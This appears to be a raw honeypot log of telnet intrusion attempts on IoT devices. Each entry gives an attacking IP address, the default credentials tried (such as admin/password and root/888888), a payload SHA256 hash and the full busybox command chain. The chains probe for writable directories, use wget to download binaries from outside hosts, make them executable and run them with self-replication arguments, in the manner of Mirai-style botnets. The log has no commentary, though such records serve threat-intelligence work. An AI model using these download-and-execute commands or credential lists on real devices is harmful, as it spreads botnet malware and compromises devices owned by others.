IP address User name Password SHA256 of the payload file 
 38.143.11.195
admin
password
539689818e9072c794c2484fe31e796bc7ed9d6daad477ab03c0a61ff3747f93
enable
shell
sh
/bin/busybox ECCHI
/bin/busybox ps; /bin/busybox ECCHI
/bin/busybox cat /proc/mounts; /bin/busybox ECCHI
/bin/busybox echo -e '\x6a\x61\x6e\x65/proc' > /proc/.nippon; /bin/busybox cat /proc/.nippon; /bin/busybox rm /proc/.nippon
/bin/busybox echo -e '\x6a\x61\x6e\x65/sys' > /sys/.nippon; /bin/busybox cat /sys/.nippon; /bin/busybox rm /sys/.nippon
/bin/busybox echo -e '\x6a\x61\x6e\x65/tmp' > /tmp/.nippon; /bin/busybox cat /tmp/.nippon; /bin/busybox rm /tmp/.nippon
/bin/busybox echo -e '\x6a\x61\x6e\x65/overlay' > /overlay/.nippon; /bin/busybox cat /overlay/.nippon; /bin/busybox rm /overlay/.nippon
/bin/busybox echo -e '\x6a\x61\x6e\x65' > /.nippon; /bin/busybox cat /.nippon; /bin/busybox rm /.nippon
/bin/busybox echo -e '\x6a\x61\x6e\x65/dev' > /dev/.nippon; /bin/busybox cat /dev/.nippon; /bin/busybox rm /dev/.nippon
/bin/busybox echo -e '\x6a\x61\x6e\x65/dev/pts' > /dev/pts/.nippon; /bin/busybox cat /dev/pts/.nippon; /bin/busybox rm /dev/pts/.nippon
/bin/busybox echo -e '\x6a\x61\x6e\x65/sys/kernel/debug' > /sys/kernel/debug/.nippon; /bin/busybox cat /sys/kernel/debug/.nippon; /bin/busybox rm /sys/kernel/debug/.nippon
/bin/busybox echo -e '\x6a\x61\x6e\x65/dev' > /dev/.nippon; /bin/busybox cat /dev/.nippon; /bin/busybox rm /dev/.nippon
/bin/busybox ECCHI
cd /
/bin/busybox cp /bin/echo wlrMedcer; >wlrMedcer; /bin/busybox chmod 777 wlrMedcer; /bin/busybox ECCHI
/bin/busybox cat /bin/echo
/bin/busybox ECCHI
cat /proc/cpuinfo; /bin/busybox ECCHI
/bin/busybox wget; /bin/busybox tftp; /bin/busybox ECCHI
/bin/busybox wget http://27.122.56.147:8888/bins/limit.arm -O - > wlrMedcer; /bin/busybox chmod 777 wlrMedcer; /bin/busybox ECCHI
./wlrMedcer telnet.arm; /bin/busybox IHCCE
/bin/busybox wget; /bin/busybox tftp; /bin/busybox ECCHI
/bin/busybox wget http://27.122.56.147:8888/bins/limit.arm7 -O - > wlrMedcer; /bin/busybox chmod 777 wlrMedcer; /bin/busybox ECCHI
./wlrMedcer telnet.arm7; /bin/busybox IHCCE
rm -rf upnp; > wlrMedcer; /bin/busybox ECCHI
 46.101.101.253
2323
3b5862fefd319b130cf0ff7f5911415ad2c6392c7ebaaff9e4a5b91dd000d32a
enable
system
shell
sh
>/tmp/.ptmx && cd /tmp/
>/var/.ptmx && cd /var/
>/dev/.ptmx && cd /dev/
>/mnt/.ptmx && cd /mnt/
>/var/run/.ptmx && cd /var/run/
>/var/tmp/.ptmx && cd /var/tmp/
>/.ptmx && cd /
>/dev/netslink/.ptmx && cd /dev/netslink/
>/dev/shm/.ptmx && cd /dev/shm/
>/bin/.ptmx && cd /bin/
>/etc/.ptmx && cd /etc/
>/boot/.ptmx && cd /boot/
>/usr/.ptmx && cd /usr/
/bin/busybox rm -rf Iwsrfg Cewsrghs
/bin/busybox cp /bin/busybox Iwsrfg; >Iwsrfg; /bin/busybox chmod 777 Iwsrfg; /bin/busybox AA
/bin/busybox cat /bin/busybox || while read i; do echo $i; done < /bin/busybox
/bin/busybox AA
/bin/busybox wget; /bin/busybox tftp; /bin/busybox AA
/bin/busybox wget http://46.101.101.253:80/bins/spc -O - > Iwsrfg; /bin/busybox chmod 777 Iwsrfg; /bin/busybox AA
./Iwsrfg loader.wget; /bin/busybox SYLVEONA
/bin/busybox rm -rf Cewsrghs; >Iwsrfg; /bin/busybox AA


 37.49.224.87
support
support
8665ca009abd78b486c299fce44476da7fde31f455f0a7bf2d27ee7e72b8250f
enable
system
shell
sh
>/tmp/.ptmx && cd /tmp/
>/var/.ptmx && cd /var/
>/dev/.ptmx && cd /dev/
>/mnt/.ptmx && cd /mnt/
>/var/run/.ptmx && cd /var/run/
>/var/tmp/.ptmx && cd /var/tmp/
>/.ptmx && cd /
>/dev/netslink/.ptmx && cd /dev/netslink/
>/dev/shm/.ptmx && cd /dev/shm/
>/bin/.ptmx && cd /bin/
>/etc/.ptmx && cd /etc/
>/boot/.ptmx && cd /boot/
>/usr/.ptmx && cd /usr/
/bin/busybox rm -rf .savanne sikeriz
/bin/busybox cp /bin/busybox .savanne; >.savanne; /bin/busybox chmod 777 .savanne; /bin/busybox UNSTABLE
/bin/busybox cat /bin/busybox || while read i; do echo $i; done < /bin/busybox
/bin/busybox UNSTABLE
/bin/busybox wget; /bin/busybox tftp; /bin/busybox UNSTABLE
/bin/busybox wget http://37.49.224.87:80/stableisbest/savanne.spc -O - > .savanne; /bin/busybox chmod 777 .savanne; /bin/busybox UNSTABLE
./.savanne selfrep.spc; /bin/busybox ELBATSNU
/bin/busybox rm -rf sikeriz; >.savanne; /bin/busybox UNSTABLE


 46.101.198.201
baby
baby
bdbd60ba5fa1d75c872d6f42a232dca65227bc09a4372a17cb7c4b7212225cc1
enable
system
shell
sh
>/tmp/.ptmx && cd /tmp/
>/var/.ptmx && cd /var/
>/dev/.ptmx && cd /dev/
>/mnt/.ptmx && cd /mnt/
>/var/run/.ptmx && cd /var/run/
>/var/tmp/.ptmx && cd /var/tmp/
>/.ptmx && cd /
>/dev/netslink/.ptmx && cd /dev/netslink/
>/dev/shm/.ptmx && cd /dev/shm/
>/bin/.ptmx && cd /bin/
>/etc/.ptmx && cd /etc/
>/boot/.ptmx && cd /boot/
>/usr/.ptmx && cd /usr/
/bin/busybox rm -rf Iwsrfg Cewsrghs
/bin/busybox cp /bin/busybox Iwsrfg; >Iwsrfg; /bin/busybox chmod 777 Iwsrfg; /bin/busybox AA
/bin/busybox cat /bin/busybox || while read i; do echo $i; done < /bin/busybox
/bin/busybox AA
/bin/busybox wget; /bin/busybox tftp; /bin/busybox AA
/bin/busybox wget http://46.101.198.201:80/bins/spc -O - > Iwsrfg; /bin/busybox chmod 777 Iwsrfg; /bin/busybox AA
./Iwsrfg loader.wget; /bin/busybox SYLVEONA
/bin/busybox rm -rf Cewsrghs; >Iwsrfg; /bin/busybox AA


 46.101.198.201
2323
f2eeef759e778134ed392b788ab834d560f285880d4f59cc57491589252cff73
enable
system
shell
sh
>/tmp/.ptmx && cd /tmp/
>/var/.ptmx && cd /var/
>/dev/.ptmx && cd /dev/
>/mnt/.ptmx && cd /mnt/
>/var/run/.ptmx && cd /var/run/
>/var/tmp/.ptmx && cd /var/tmp/
>/.ptmx && cd /
>/dev/netslink/.ptmx && cd /dev/netslink/
>/dev/shm/.ptmx && cd /dev/shm/
>/bin/.ptmx && cd /bin/
>/etc/.ptmx && cd /etc/
>/boot/.ptmx && cd /boot/
>/usr/.ptmx && cd /usr/
/bin/busybox rm -rf Iwsrfg Cewsrghs
/bin/busybox cp /bin/busybox Iwsrfg; >Iwsrfg; /bin/busybox chmod 777 Iwsrfg; /bin/busybox AA
/bin/busybox cat /bin/busybox || while read i; do echo $i; done < /bin/busybox
/bin/busybox AA
/bin/busybox cat /proc/cpuinfo || while read i; do echo $i; done < /proc/cpuinfo; /bin/busybox AA
/bin/busybox wget; /bin/busybox tftp; /bin/busybox AA
/bin/busybox wget http://46.101.198.201:80/bins/arm -O - > Iwsrfg; /bin/busybox chmod 777 Iwsrfg; /bin/busybox AA
./Iwsrfg loader.wget; /bin/busybox SYLVEONA
/bin/busybox rm -rf Cewsrghs Iwsrfg
/bin/busybox cp /bin/busybox Iwsrfg; >Iwsrfg; /bin/busybox chmod 777 Iwsrfg; /bin/busybox AA
/bin/busybox wget; /bin/busybox tftp; /bin/busybox AA
/bin/busybox wget http://46.101.198.201:80/bins/arm7 -O - > Iwsrfg; /bin/busybox chmod 777 Iwsrfg; /bin/busybox AA
./Iwsrfg loader.wget; /bin/busybox SYLVEONA
/bin/busybox rm -rf Cewsrghs; >Iwsrfg; /bin/busybox AA


 149.56.26.173
root
888888
2646bd9f9050ce9d691d5d2705ddff2b25a93d76021f19f4f1c45d26f5dbdf1e
enable
system
shell
sh
>/tmp/.ptmx && cd /tmp/
>/var/.ptmx && cd /var/
>/dev/.ptmx && cd /dev/
>/mnt/.ptmx && cd /mnt/
>/var/run/.ptmx && cd /var/run/
>/var/tmp/.ptmx && cd /var/tmp/
>/.ptmx && cd /
>/dev/netslink/.ptmx && cd /dev/netslink/
>/dev/shm/.ptmx && cd /dev/shm/
>/bin/.ptmx && cd /bin/
>/etc/.ptmx && cd /etc/
>/boot/.ptmx && cd /boot/
>/usr/.ptmx && cd /usr/
/bin/busybox rm -rf .ratatada sikeriz
/bin/busybox cp /bin/busybox .ratatada; >.ratatada; /bin/busybox chmod 777 .ratatada; /bin/busybox UNSTABLE
/bin/busybox cat /bin/busybox || while read i; do echo $i; done < /bin/busybox
/bin/busybox UNSTABLE
/bin/busybox wget; /bin/busybox tftp; /bin/busybox UNSTABLE
/bin/busybox wget http://149.56.26.173:80/dirdir000/0s1s12.x86 -O - > .ratatada; /bin/busybox chmod 777 .ratatada; /bin/busybox UNSTABLE
./.ratatada selfrep.x86; /bin/busybox ELBATSNU
/bin/busybox rm -rf sikeriz; >.ratatada; /bin/busybox UNSTABLE


 38.143.11.195
root
1111
ebaf97dfc3a370e67ac462fa7348424c1f9a7711528c26e3fb10688ee75de4b7
enable
shell
sh
/bin/busybox ECCHI
/bin/busybox ps; /bin/busybox ECCHI
/bin/busybox cat /proc/mounts; /bin/busybox ECCHI
/bin/busybox echo -e '\x6a\x61\x6e\x65/proc' > /proc/.nippon; /bin/busybox cat /proc/.nippon; /bin/busybox rm /proc/.nippon
/bin/busybox echo -e '\x6a\x61\x6e\x65/sys' > /sys/.nippon; /bin/busybox cat /sys/.nippon; /bin/busybox rm /sys/.nippon
/bin/busybox echo -e '\x6a\x61\x6e\x65/tmp' > /tmp/.nippon; /bin/busybox cat /tmp/.nippon; /bin/busybox rm /tmp/.nippon
/bin/busybox echo -e '\x6a\x61\x6e\x65/overlay' > /overlay/.nippon; /bin/busybox cat /overlay/.nippon; /bin/busybox rm /overlay/.nippon
/bin/busybox echo -e '\x6a\x61\x6e\x65' > /.nippon; /bin/busybox cat /.nippon; /bin/busybox rm /.nippon
/bin/busybox echo -e '\x6a\x61\x6e\x65/dev' > /dev/.nippon; /bin/busybox cat /dev/.nippon; /bin/busybox rm /dev/.nippon
/bin/busybox echo -e '\x6a\x61\x6e\x65/dev/pts' > /dev/pts/.nippon; /bin/busybox cat /dev/pts/.nippon; /bin/busybox rm /dev/pts/.nippon
/bin/busybox echo -e '\x6a\x61\x6e\x65/sys/kernel/debug' > /sys/kernel/debug/.nippon; /bin/busybox cat /sys/kernel/debug/.nippon; /bin/busybox rm /sys/kernel/debug/.nippon
/bin/busybox echo -e '\x6a\x61\x6e\x65/dev' > /dev/.nippon; /bin/busybox cat /dev/.nippon; /bin/busybox rm /dev/.nippon
/bin/busybox ECCHI
cd /
/bin/busybox cp /bin/echo wlrMedcer; >wlrMedcer; /bin/busybox chmod 777 wlrMedcer; /bin/busybox ECCHI
/bin/busybox cat /bin/echo
/bin/busybox ECCHI
/bin/busybox wget; /bin/busybox tftp; /bin/busybox ECCHI
/bin/busybox wget http://27.122.56.147:8888/bins/limit.x86 -O - > wlrMedcer; /bin/busybox chmod 777 wlrMedcer; /bin/busybox ECCHI
./wlrMedcer telnet.x86; /bin/busybox IHCCE
rm -rf upnp; > wlrMedcer; /bin/busybox ECCHI


 149.56.26.173
adm
cf6c786d685fb92d5954cc16e1505964a468178e198e3c04739bfa01a5b57cf9
enable
system
shell
sh
>/tmp/.ptmx && cd /tmp/
>/var/.ptmx && cd /var/
>/dev/.ptmx && cd /dev/
>/mnt/.ptmx && cd /mnt/
>/var/run/.ptmx && cd /var/run/
>/var/tmp/.ptmx && cd /var/tmp/
>/.ptmx && cd /
>/dev/netslink/.ptmx && cd /dev/netslink/
>/dev/shm/.ptmx && cd /dev/shm/
>/bin/.ptmx && cd /bin/
>/etc/.ptmx && cd /etc/
>/boot/.ptmx && cd /boot/
>/usr/.ptmx && cd /usr/
/bin/busybox rm -rf .ratatada sikeriz
/bin/busybox cp /bin/busybox .ratatada; >.ratatada; /bin/busybox chmod 777 .ratatada; /bin/busybox UNSTABLE
/bin/busybox cat /bin/busybox || while read i; do echo $i; done < /bin/busybox
/bin/busybox UNSTABLE
/bin/busybox wget; /bin/busybox tftp; /bin/busybox UNSTABLE
/bin/busybox wget http://149.56.26.173:80/dirdir000/0s1s12.m68k -O - > .ratatada; /bin/busybox chmod 777 .ratatada; /bin/busybox UNSTABLE
./.ratatada selfrep.m68k; /bin/busybox ELBATSNU
/bin/busybox rm -rf sikeriz; >.ratatada; /bin/busybox UNSTABLE